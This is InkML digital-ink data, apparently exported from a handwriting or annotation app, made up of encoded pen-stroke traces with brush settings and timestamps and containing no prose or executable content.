  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 70 24575,'5'-9'0,"3"4"0,-3-2 0,-1 2 0,4 0 0,-3-3 0,3 3 0,1 1 0,-4-4 0,2 7 0,-2-3 0,0 0 0,2 3 0,-2-3 0,4 4 0,-1 0 0,1 0 0,7 0 0,-1 0 0,10 8 0,-7-6 0,3 9 0,-4-6 0,8 4 0,-9-1 0,12-3 0,-14 3 0,7-4 0,-3 5 0,6 1 0,2 4 0,0-3 0,-6 4 0,4-5 0,23 19 0,-14-15 0,49 27 0,-37-19 0,44 9 0,-24-7 0,-1-3 0,-25-9 0,-14 1 0,-11-9 0,6 8 0,-10-10 0,14 5 0,-13-7 0,5 4 0,-3 1 0,12 4 0,-9-1 0,12 1 0,-8 5 0,7-4 0,-1 5 0,7-3 0,-14-2 0,10 6 0,-11-10 0,0 5 0,-2-6 0,5 4 0,-6-5 0,5 4 0,0 3 0,2 0 0,4 4 0,9-1 0,-8 2 0,25 15 0,-16-7 0,18 19 0,-20-18 0,8 5 0,0 0 0,2-1 0,14 11 0,-1-1 0,-15-10 0,22 19 0,-40-32 0,1 8 0,-10-9 0,30 31 0,-27-24 0,27 18 0,-26-22 0,17 13 0,-20-19 0,12 11 0,-22-18 0,5 4 0,-6-1 0,11 12 0,-1-4 0,6 9 0,-4-8 0,8 2 0,-6-5 0,9 13 0,-14-20 0,2 12 0,-7-14 0,-1 4 0,1 3 0,15 9 0,-8-5 0,28 14 0,-16-18 0,2 6 0,0-2 0,-15-6 0,10 9 0,-8-10 0,0 7 0,-3-6 0,-2 2 0,-3-3 0,-1 0 0,-3-1 0,6 5 0,-9-4 0,10 3 0,-11-3 0,2 0 0,-3 3 0,0-2 0,0 6 0,0 4 0,0 0 0,0 4 0,0 0 0,-8 18 0,-2-13 0,-9 11 0,2-22 0,-21 19 0,-9 2 0,-13 7 0,-1 2 0,0-2-792,-6-2 0,-5 0 792,28-17 0,-1-1-415,-28 11 0,-5 2 415,9-1 0,-3 0 0,5-11 0,-5-1 0,9-3 0,15-3 0,2-1 0,-20 0 0,6-3 0,14-3 0,-18 5 0,-1-1 0,-7 4 0,0 1 0,-7-1-290,14-1 1,1-1 289,-11-3 1466,23-2-1466,-7 0 0,18-3 0,13-5 871,-4 3-871,15-5 0,3 5 0,1 0 656,-3 7-656,5-10 0,-9 10 0,10-12 0,-3 1 0,5 3 0,-9 0 0,7-2 0,-3 6 0,5-8 0,-1 1 0,4 3 0,-7-7 0,7 6 0,-4-6 0,1 7 0,-1-3 0,0 0 0,0 2 0,1-2 0,-1 0 0,0-1 0,0-1 0,1 2 0,-1 0 0,0-1 0,-3 0 0,2-4 0,-3 4 0,8 0 0,-2-3 0,2 3 0,0 0 0,-3-3 0,7 6 0,-7-6 0,11-9 0,-6-2 0,7-12 0,-4 5 0,-5-8 0,4 6 0,-4-25 0,5 22 0,0-15 0,0 12 0,0-1 0,0 0 0,0 1 0,0 12 0,0 0 0,0 4 0,0 1 0,0-5 0,0 3 0,0-2 0,0 3 0,0 4 0,0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0:59:59.495"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'17'0'0,"8"0"0,-10 0 0,15 5 0,-8-3 0,37 10 0,-27-10 0,25 11 0,-31-12 0,-4 4 0,-3-1 0,-10-3 0,0 3 0,-1-4 0,1 0 0,-1 4 0,5-3 0,-4 6 0,4-6 0,-5 7 0,1-7 0,0 3 0,-5-4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01:10.108"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">50 53 24575,'14'0'0,"-2"0"0,-3 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,-3-4 0,3 3 0,-3-3 0,-1 1 0,4 2 0,-3-7 0,3 7 0,-3-7 0,3 7 0,1-3 0,0 0 0,7 3 0,-2-3 0,10 4 0,-5 0 0,13 0 0,-13 0 0,12 0 0,-12-3 0,5 2 0,1-3 0,1 4 0,7 0 0,-11 0 0,21 0 0,10 7 0,-1-1 0,21 2 0,-24-3 0,13-5 0,-1 0 0,-12 0 0,-3 0 0,-13 5 0,-7-4 0,-2 4 0,-10-1 0,-2-3 0,-3 3 0,-1-1 0,1-2 0,0 3 0,3-4 0,-2 0 0,6 0 0,-3 0 0,1 0 0,2 0 0,-6 0 0,6 0 0,5 5 0,-2 0 0,5 9 0,0-4 0,-5 3 0,13-2 0,-6-1 0,0-4 0,5 3 0,-5-2 0,7-1 0,0-2 0,-11-4 0,2 4 0,-15-3 0,4 3 0,-5-4 0,8 4 0,-1-3 0,2 3 0,-4-4 0,-1 0 0,-2 0 0,2 0 0,1 0 0,-4 0 0,14 0 0,-7 0 0,4 0 0,-4 0 0,-2 0 0,3 0 0,-3 0 0,-6-4 0,0-1 0,-3 0 0,3 1 0,1 4 0,-1 0 0,1 0 0,0 0 0,3 0 0,2 0 0,10 0 0,2 0 0,-4 0 0,1 4 0,-2-3 0,5 8 0,0-8 0,5 9 0,-12-9 0,6 8 0,-1-4 0,2 0 0,-4 0 0,1-1 0,-2 2 0,30 7 0,-11-1 0,11-3 0,-7 3 0,-2-4 0,7 1 0,-14 1 0,20-1 0,-37-3 0,31 2 0,-36-8 0,5 4 0,-1-3 0,0 3 0,-3-4 0,2 3 0,-2-2 0,3 7 0,0-7 0,1 3 0,-1-4 0,0 4 0,15 0 0,-11 5 0,11 0 0,-8 0 0,-4 0 0,4-3 0,-7 1 0,0-6 0,1 7 0,-1-3 0,0 3 0,1-3 0,-1 3 0,0-7 0,1 6 0,-5-2 0,4 4 0,-4-1 0,12 1 0,-10 0 0,6-5 0,-13 0 0,1 0 0,-1-3 0,1 7 0,0-7 0,-1 6 0,1-2 0,3 0 0,-2 2 0,2-2 0,-3 0 0,-4 2 0,-2-2 0,-3 4 0,0-1 0,0 1 0,0 0 0,-3 3 0,-2 2 0,-4-1 0,4 3 0,-3-2 0,3-1 0,-3 0 0,3-5 0,-3 1 0,3-1 0,0 1 0,-2 0 0,2-5 0,-4 8 0,4-6 0,-6 6 0,9-3 0,-10-4 0,7 2 0,-4-2 0,1 0 0,-1 2 0,0-2 0,0 4 0,-3-1 0,2 1 0,-6-1 0,6-3 0,-7 3 0,4-7 0,-5 6 0,1-6 0,-8 8 0,6-4 0,-12 6 0,11-2 0,-11 1 0,5 0 0,-20-4 0,20 3 0,-29-1 0,29-3 0,-20 2 0,13-2 0,7-4 0,1 8 0,8-8 0,0 3 0,-1-4 0,-6 0 0,-3 0 0,1 4 0,-5-3 0,5 7 0,-8-7 0,1 9 0,0-4 0,11 0 0,-9 4 0,9-4 0,-4 0 0,-13 3 0,17-8 0,-6 3 0,15-4 0,1 4 0,-2-3 0,-3 2 0,-1 1 0,1-3 0,-8 8 0,6-8 0,-5 8 0,-1-8 0,10 2 0,-9 1 0,4-3 0,-21 3 0,4 1 0,-4-4 0,17 4 0,6-5 0,1 4 0,-1-3 0,-6 3 0,-2-4 0,-20 0 0,-3 0 0,0 0 0,-50 14 0,27-10 0,6 8 0,2 0 0,3-10 0,-34 7 0,49-3 0,-15-4 0,15 10 0,13-6 0,0 5 0,-1-5 0,8 3 0,-5-3 0,5 8 0,3-6 0,-7 1 0,14-5 0,-8 1 0,0 5 0,-3 5 0,-6-3 0,0 9 0,7-10 0,-6 4 0,13-6 0,-12 2 0,15-2 0,-7 0 0,13-4 0,-6 3 0,-5-2 0,2 2 0,-6 6 0,-3 0 0,1 1 0,-3-1 0,5-4 0,8-6 0,3 4 0,-9-2 0,8-1 0,-10 4 0,12-5 0,-8 5 0,10-4 0,-5 2 0,7-6 0,4 7 0,-6-7 0,5 6 0,-11-6 0,4 7 0,-1-7 0,2 7 0,-1-4 0,3 5 0,-2-4 0,3 2 0,0-6 0,8-5 0,-2-12 0,7-10 0,-4 3 0,0-7 0,0 14 0,0-8 0,0 6 0,0 1 0,0 0 0,0 3 0,0 1 0,0 5 0,0-1 0,0 0 0,0 0 0,0 1 0,0 3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01:12.046"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 18 24575,'9'-8'0,"-1"3"0,1 1 0,3 4 0,-2 0 0,6 0 0,-6 0 0,2 4 0,0-3 0,-2 3 0,3-4 0,-5 3 0,1-2 0,-1 3 0,1-4 0,-1 4 0,1-3 0,0 7 0,3-4 0,2 1 0,3 3 0,0-7 0,-3 2 0,-2-3 0,-3 0 0,-1 0 0,1 4 0,-1-3 0,1 3 0,0-4 0,-1 4 0,12 2 0,-9 3 0,12-4 0,-13-1 0,2-4 0,-3 4 0,0-3 0,-5 7 0,4-7 0,-7 6 0,7-6 0,-8 7 0,8-7 0,-3 6 0,3-2 0,1 0 0,-4 3 0,2-7 0,-6-2 0,3 0 0,-4-2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17:43.257"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1339 0 24575,'-19'9'0,"3"-4"0,3 2 0,4-2 0,-8 4 0,7-1 0,-14 5 0,9-4 0,-11 4 0,2 1 0,5 0 0,-26 12 0,16-5 0,-23 15 0,5-7 0,5 5 0,-17-4 0,23-12 0,-3 0 0,15-4 0,-1-3 0,6 5 0,-27 1 0,23 1 0,-23-2 0,26-3 0,-11 2 0,12-4 0,-6 7 0,8-8 0,-15 11 0,10-10 0,-17 12 0,24-13 0,-9 5 0,11-3 0,-16 5 0,12-2 0,-11-3 0,22-4 0,-5-7 0,2 6 0,-27 7 0,17-7 0,-27 15 0,30-16 0,-15 10 0,12-3 0,-18 1 0,17-4 0,-5 1 0,16-14 0,9 6 0,5-15 0,0 7 0,-2-8 0,-3 0 0,4 4 0,-3-8 0,3 3 0,1-10 0,-4-6 0,4-17 0,3-19 0,-6 14 0,2-1 0,0 0 0,-4 8 0,4-33 0,-3 56 0,2 6 0,-3 7 0,0 4 0,0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17:44.474"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 26 24575,'14'-14'0,"2"2"0,-2 12 0,3 0 0,7 0 0,2 0 0,7 0 0,13 0 0,-10 5 0,10 1 0,-9 0 0,-3-1 0,-8-5 0,-7 0 0,-6 0 0,-4 0 0,4 4 0,-5 1 0,1 0 0,-1 2 0,5-2 0,-4 4 0,8-1 0,-8 1 0,8-1 0,-4 1 0,12 7 0,-10-5 0,13 5 0,-13-7 0,2-1 0,-5 1 0,16 4 0,-11-3 0,11 0 0,-16-7 0,-7-3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6:16.321"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'17'0'0,"-3"0"0,-6 0 0,0 0 0,0 0 0,4 0 0,-4 0 0,4 0 0,-1 0 0,2 0 0,2 4 0,1-4 0,0 4 0,0-4 0,0 0 0,0 0 0,-4 0 0,0 0 0,-4 0 0,0 0 0,-1 0 0,1 3 0,4-2 0,6 3 0,6 0 0,0-3 0,-5 4 0,2-5 0,-7 0 0,9 0 0,-7 0 0,0 3 0,-4-2 0,3 3 0,-6-1 0,6-2 0,-3 6 0,0-6 0,3 3 0,-2-4 0,-1-4 0,-1 3 0,8-6 0,-8 6 0,17-2 0,-14 3 0,15 0 0,-12 0 0,12 0 0,-5 0 0,0 0 0,-6 0 0,-3 0 0,4 0 0,-1 0 0,4 3 0,7-2 0,-3 7 0,23-7 0,-16 8 0,9-8 0,-11 4 0,11-5 0,-9 0 0,9 0 0,-12 0 0,-6-4 0,5 3 0,-5-3 0,-1 4 0,0 0 0,-7 0 0,0 0 0,6 0 0,2 5 0,6-4 0,0 4 0,-6-5 0,5-5 0,7 4 0,-10-4 0,15 1 0,-17 3 0,6-4 0,0 5 0,-6 0 0,-2 0 0,-9 0 0,2 0 0,-6 0 0,6 0 0,-3 4 0,4-3 0,-4 6 0,3-7 0,4 4 0,-2-1 0,12-2 0,-11 3 0,10-4 0,-14 0 0,8 0 0,-10 0 0,0 0 0,0 0 0,-4 0 0,-1 0 0,1 0 0,0 0 0,0-4 0,4 3 0,-4-2 0,4 3 0,-1 0 0,-2 0 0,6 0 0,-3 0 0,11 0 0,-6 0 0,12 0 0,-12 0 0,12 0 0,-5 0 0,6 0 0,1 0 0,-1 0 0,0 0 0,-6 0 0,-5 0 0,-8 0 0,-3 0 0,-3 0 0,-2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6:19.653"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 41 24575,'12'-9'0,"-4"-1"0,-1 9 0,-3-3 0,11 1 0,-5 2 0,5-3 0,-7 4 0,-1 0 0,1 4 0,0-3 0,4 2 0,-4-3 0,4 4 0,-4-4 0,3 4 0,2-4 0,-1 0 0,-1 0 0,-3 0 0,4 0 0,-4 0 0,8 0 0,-8 0 0,4 0 0,-4 0 0,-1 0 0,1 0 0,0 0 0,0-4 0,4 4 0,0-4 0,0 4 0,3-4 0,-2 3 0,-1-6 0,-1 6 0,1-2 0,-3 3 0,2 0 0,-3 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0 0 0,4 0 0,0 0 0,0 0 0,3 0 0,-6 0 0,2 0 0,1 0 0,7 0 0,-2 0 0,5 0 0,-6 0 0,0 0 0,0 0 0,-3 0 0,-2 0 0,-3 0 0,0 0 0,0 0 0,3 0 0,1 3 0,4-2 0,0 3 0,7-4 0,-6 0 0,12 0 0,-5 0 0,29 0 0,-23 0 0,16 0 0,-30 0 0,-1 0 0,1 0 0,-3 0 0,-2 0 0,-3 0 0,3 0 0,-2 0 0,3 0 0,-4 0 0,-1 3 0,5-2 0,0 3 0,4-4 0,0 0 0,6 0 0,-4 0 0,1 0 0,-4 0 0,-3 0 0,10 4 0,-4-3 0,0 4 0,-6-2 0,-4-2 0,3 3 0,-2-4 0,6 0 0,-6 0 0,12 0 0,0 0 0,9 0 0,0 4 0,0-3 0,-6 4 0,5-5 0,-11 0 0,4 0 0,-6 0 0,0 0 0,-4 0 0,9 0 0,-7 0 0,5 0 0,-4-4 0,-6 3 0,2-2 0,-3 3 0,4 0 0,-4 3 0,7 2 0,-2-1 0,3-1 0,6-3 0,-4 4 0,10-3 0,-4 7 0,18-7 0,-9 8 0,21-2 0,3 7 0,2-6 0,9-1 0,-11-7 0,-12 0 0,-13 0 0,-11 0 0,-12 0 0,-1-4 0,-5 4 0,-3-4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6:29.882"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 236 24575,'8'-5'0,"-4"-2"0,7 2 0,-2-3 0,8 0 0,-1-1 0,0 1 0,7-1 0,2-1 0,-1-3 0,-1 3 0,-10 2 0,-1 1 0,-4 2 0,0 0 0,0 2 0,0 3 0,-3-4 0,2 3 0,-6-6 0,6 6 0,-2-6 0,3 2 0,3-3 0,-5 0 0,8-1 0,-8 1 0,6 0 0,-4 3 0,-4-2 0,3 2 0,-2 1 0,3-4 0,0 8 0,0-4 0,0 0 0,0 3 0,-3-6 0,-1 6 0,-4-3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6:27.160"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'16'17'0,"-1"8"0,-7-14 0,0 7 0,-4-10 0,0 4 0,0 6 0,1 0 0,4 4 0,-5-6 0,9 6 0,-6 2 0,6 0 0,2 5 0,-5-5 0,4 6 0,-4 1 0,0-1 0,2 12 0,3-9 0,-2 9 0,-3-12 0,-1 1 0,-3-1 0,3-3 0,-4-4 0,2-7 0,-6-4 0,6-8 0,-6 3 0,3-2 0,-1 2 0,-2 1 0,6 4 0,-3-3 0,1 6 0,2-3 0,-3 0 0,1 0 0,2-4 0,-6-1 0,6 1 0,-3-3 0,0-5 0,3-5 0,-6-3 0,6 0 0,-2 4 0,-1 0 0,-1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6:28.404"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">316 1 24575,'-16'12'0,"-3"3"0,10-6 0,-3 6 0,4-3 0,0 0 0,-3 3 0,2-6 0,-6 6 0,6-3 0,-6 4 0,0 6 0,-1-4 0,-4 11 0,7-15 0,-6 13 0,9-13 0,-7 9 0,7-1 0,-1-8 0,2 7 0,1-8 0,0 3 0,0-1 0,0-2 0,3-2 0,-2-3 0,6 0 0,5-25 0,-3 15 0,6-19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6:29.680"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'27'0'0,"0"2"0,3 8 0,1 0 0,11 2 0,2 7 0,1-6 0,21 16 0,-37-18 0,13 5 0,-30-12 0,-4-1 0,0 1 0,0 1 0,-1-2 0,1 1 0,0-3 0,-3 2 0,-2-3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9:30.173"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">218 88 24575,'-17'16'0,"0"-9"0,11 8 0,-5-8 0,0 9 0,-2-3 0,2 3 0,1 0 0,3-3 0,-4 3 0,4-5 0,-3 1 0,4-1 0,-6 0 0,6 1 0,-4 4 0,3 2 0,1-1 0,-4 5 0,3-10 0,1 5 0,1-6 0,5 0 0,-5 1 0,3-1 0,-3 0 0,5 0 0,0 1 0,0-1 0,0 5 0,0-3 0,0 3 0,0-4 0,0 4 0,0 2 0,0-1 0,0 0 0,0-6 0,5-5 0,-3 4 0,8 2 0,-4 5 0,5 1 0,0-2 0,-4-4 0,3-1 0,-4 0 0,0 0 0,4 1 0,-3-1 0,-1 0 0,4-4 0,-9 3 0,9-9 0,-9 9 0,9-9 0,-8 9 0,3-4 0,0 1 0,-4 3 0,9 1 0,-4-3 0,1 7 0,3-14 0,-9 9 0,9-9 0,-9 9 0,9-8 0,-9 8 0,9-9 0,-3 9 0,4-4 0,0 6 0,1 4 0,-1-9 0,0 9 0,0-5 0,6 1 0,-5 5 0,5-11 0,-6 4 0,0-9 0,-4 9 0,3-8 0,-9 8 0,9-4 0,-4 5 0,5 1 0,1-1 0,4 0 0,-3 0 0,3 1 0,0-6 0,-3 4 0,3-4 0,-4 6 0,-1-6 0,0 4 0,-4-4 0,8 0 0,-13 4 0,13-8 0,-8 8 0,4-9 0,-5 9 0,4-9 0,-4 9 0,11-3 0,0 9 0,6-9 0,0 14 0,9-12 0,2 9 0,10-4 0,-10-1 0,7 1 0,-7-1 0,9 2 0,18 2 0,-14-2 0,-1-5 0,-6-3 0,-20-7 0,37 9 0,-18-7 0,21 13 0,-17-13 0,1 4 0,-10-6 0,-7 0 0,-6 0 0,-3 0 0,5 5 0,-6 2 0,0-1 0,-6-1 0,0-5 0,1 0 0,4 0 0,-4 0 0,10 0 0,-10 5 0,10-4 0,-10 4 0,10-5 0,-10 0 0,5 0 0,-6 0 0,0 5 0,1-4 0,-1 4 0,0-5 0,0 5 0,1-3 0,-1 3 0,0 0 0,1-4 0,-1 4 0,0 0 0,6-4 0,0 9 0,1-8 0,3 3 0,-8-5 0,8 0 0,-3 5 0,0-4 0,3 4 0,-3 0 0,5-4 0,-6 4 0,5 0 0,5-4 0,-2 4 0,16-5 0,-21 0 0,5 0 0,-13 0 0,-1 0 0,0 5 0,0-3 0,1 3 0,-1-5 0,0 0 0,6 0 0,-5 0 0,10 0 0,-10 0 0,10 0 0,-10 0 0,5 0 0,-1 0 0,-3 0 0,3 0 0,-5 0 0,1 0 0,-1 0 0,0 0 0,6 0 0,-5 0 0,10 0 0,-10-5 0,10 3 0,-5-3 0,6 5 0,0 0 0,-6 0 0,0 0 0,-1 0 0,2 0 0,0-5 0,3 4 0,-3-4 0,4 5 0,21-5 0,10 3 0,5-3 0,-7 5 0,-25-5 0,-9 4 0,-1-4 0,-3 0 0,3 3 0,-5-3 0,1 0 0,-1 4 0,10-9 0,-7 8 0,8-3 0,-11 0 0,0 4 0,0-4 0,1 0 0,4 3 0,-8-8 0,7 9 0,-4-4 0,2 0 0,3 4 0,-5-5 0,1 1 0,-1-1 0,0 0 0,0 0 0,1 1 0,-1 4 0,5-4 0,2 0 0,0-1 0,3-6 0,-3 1 0,0 4 0,-2-3 0,0 4 0,-3-6 0,3 6 0,-4-4 0,-1 3 0,0-4 0,0-1 0,1 1 0,-1-1 0,-5 1 0,4-1 0,-3 1 0,-1-1 0,4 1 0,-4-1 0,0 1 0,4-1 0,-3 1 0,-1-1 0,4 1 0,-9 0 0,9-6 0,-3 4 0,-1-9 0,4 10 0,-9-10 0,9 9 0,-9-8 0,9 8 0,-8-4 0,8 1 0,-9 3 0,4-9 0,-5 10 0,5-5 0,-4 0 0,4 5 0,-5-5 0,5 6 0,-4-6 0,4 4 0,-5-3 0,0 4 0,0-4 0,0-2 0,0-5 0,0 5 0,0 1 0,0 6 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,6 6 0,-5-5 0,4 5 0,-5-5 0,0-1 0,0 1 0,5-1 0,-4 1 0,4-1 0,-5 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,-5 5 0,4-5 0,-4 5 0,5-5 0,-6 4 0,5-3 0,-9 4 0,4-1 0,-1-3 0,-8 4 0,7-11 0,-23-4 0,16 3 0,-25-9 0,20 13 0,-12-10 0,9 11 0,0-4 0,5 11 0,2-4 0,4 9 0,1-5 0,-1 6 0,1 0 0,-1-5 0,1 4 0,-1-4 0,-4 5 0,-11 0 0,7 0 0,-20-7 0,-6 6 0,12-6 0,-39-2 0,39 1 0,-26-3 0,16 4 0,10 7 0,-7-6 0,6 4 0,1-4 0,7 1 0,5 3 0,4-3 0,1 5 0,-5-5 0,9 4 0,-3-4 0,-1 5 0,-1 0 0,0 0 0,2 0 0,-10 0 0,-20 0 0,12 0 0,-22 0 0,26 0 0,-4 5 0,2-4 0,0 11 0,-3-11 0,1 5 0,-7 1 0,6-6 0,1 11 0,-7-11 0,6 11 0,1-11 0,2 6 0,9-7 0,0 5 0,5-4 0,1 4 0,6-5 0,4 5 0,-3-4 0,4 4 0,-6-5 0,1 0 0,-1 0 0,1 0 0,-6 0 0,-1 0 0,1 0 0,-14 0 0,6 0 0,-9-5 0,-3 4 0,12-4 0,-17-2 0,8 6 0,-10-6 0,-16-2 0,12 0 0,-12-1 0,0-6 0,21 9 0,-19-4 0,24 0 0,-1 9 0,3-4 0,9 6 0,5 0 0,2 0 0,4 0 0,1 0 0,-6 0 0,5 0 0,-10 0 0,9 0 0,-3 0 0,4 0 0,-4-6 0,3 5 0,-9-4 0,9 5 0,-8 0 0,3-5 0,-5 4 0,5-4 0,1 5 0,1 0 0,3 0 0,-9 0 0,10 0 0,-10 5 0,9-4 0,-3 4 0,-1 0 0,-1-4 0,0 4 0,-3-5 0,8 0 0,-9 0 0,15 5 0,-9-4 0,10 4 0,-6 0 0,1-3 0,-1 3 0,1 0 0,0-4 0,4 9 0,-3-9 0,4 9 0,-6-8 0,1 8 0,-1-4 0,1 0 0,-1 4 0,1-9 0,-1 4 0,1-5 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,-4 0 0,3 0 0,-9 0 0,5 0 0,-6 0 0,0 0 0,0 0 0,0 0 0,5 0 0,6 0 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9:35.156"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">4179 1 24575,'-18'0'0,"-14"10"0,11-8 0,-21 15 0,17-11 0,-16 8 0,15-2 0,-15 2 0,7-7 0,-1 4 0,-39 1 0,45-4 0,-35 12 0,37-11 0,2 8 0,-33 8 0,28-10 0,-19 4 0,26-9 0,0-9 0,0 9 0,1-8 0,-1 8 0,-10-9 0,8 9 0,-16-2 0,7 5 0,-1 5 0,-6-3 0,16 2 0,-17-9 0,22-3 0,-6 0 0,10-4 0,-2 9 0,-5-9 0,-9 11 0,-3-11 0,-25 15 0,-4-14 0,-17 7 0,-1 0 0,18-7 0,4 7 0,0 0 0,12-7 0,-12 7 0,16-9 0,0 0 0,10 5 0,-7-4 0,6 11 0,-8-11 0,8 6 0,3-2 0,9-4 0,-5 9 0,9-9 0,-8 9 0,9-3 0,-5-1 0,-9 5 0,-2-9 0,-1 9 0,3-9 0,9 3 0,6 0 0,0-4 0,-19 9 0,13-9 0,-45 13 0,30-11 0,-14 11 0,20-13 0,9 4 0,-9 1 0,-2-4 0,-10 4 0,10-6 0,-7 0 0,6 0 0,-8 0 0,13 5 0,-10-4 0,11 11 0,-6-11 0,3 6 0,9-7 0,0 0 0,6 0 0,-5 0 0,4 0 0,-5 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-9 0 0,-2 0 0,-10 0 0,10 0 0,2 0 0,0 0 0,-3 0 0,6 0 0,-2 0 0,13 0 0,0 0 0,2 0 0,4 0 0,1 0 0,-1 0 0,-4 0 0,3 0 0,-9 0 0,4 0 0,1 0 0,-5 0 0,9 0 0,-3 0 0,-1 5 0,4-4 0,-3 4 0,-1-5 0,-1 0 0,-14 0 0,7 0 0,-7 0 0,9 0 0,5 0 0,1 0 0,6 5 0,-1-4 0,1 4 0,9-5 0,9-10 0,0 3 0,18-36 0,-8 11 0,6-8 0,1 9 0,-10 4 0,11-7 0,-10-1 0,5-6 0,-8 16 0,0-8 0,0 11 0,-6 4 0,4 6 0,-9 2 0,9 9 0,-8-4 0,3 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4T15:29:36.773"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 12 24575,'18'-6'0,"-2"0"0,-5 6 0,1 5 0,-1 2 0,5 4 0,-3 0 0,3-4 0,-5 3 0,1-4 0,-1 0 0,-5 4 0,9-4 0,-7 6 0,8-1 0,-9 0 0,3 1 0,-4-1 0,5 0 0,1 0 0,-1 1 0,0-6 0,-5 4 0,4-4 0,-3 6 0,4-1 0,0 5 0,0 2 0,1-1 0,-1 0 0,0-6 0,-4 0 0,3 1 0,-4-1 0,5 0 0,-5 1 0,4-6 0,-8-6 0,3-7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35:07.736"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
